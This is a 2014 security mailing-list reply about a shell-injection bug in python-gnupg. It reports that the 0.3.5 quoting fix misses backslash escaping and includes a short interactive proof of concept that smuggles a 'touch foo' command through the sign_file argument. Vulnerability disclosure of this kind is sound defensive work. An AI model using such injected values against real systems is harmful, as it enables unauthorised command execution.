Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CAD3CancDiRhPs9zeqg8SK19A3JbAb_eCx+x0e3STFMLPneTrXw@mail.gmail.com>
Date: Tue, 4 Feb 2014 23:27:34 +1300
From: Matthew Daley <mattd@...fuzz.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE request: python-gnupg before 0.3.5 shell injection

On Tue, Feb 4, 2014 at 11:04 PM, Henri Salo <henri@...v.fi> wrote:
> On Tue, Feb 04, 2014 at 10:35:46AM +0100, Hanno Böck wrote:
>> python-gnupg 0.3.5 lists in the changelog:
>> "Added improved shell quoting to guard against shell injection."
>>
>> Sounds like a severe security issue, but further info is lacking.
>
> Diff attached. New function shell_quote() seems to represent major changes to
> shell input quoting against unsafe input.
> [...]

This appears to (at least) miss escaping of backslashes:

$ ls foo
ls: cannot access foo: No such file or directory
$ python
Python 2.7.6 (default, Jan 11 2014, 14:34:26)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import gnupg
>>> gnupg.GPG().sign_file(open("/dev/null"), "'\\\"; touch foo #'")
<gnupg.Sign object at 0x7fb3dbfad7d0>
>>>
$ ls foo
foo

- Matthew

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.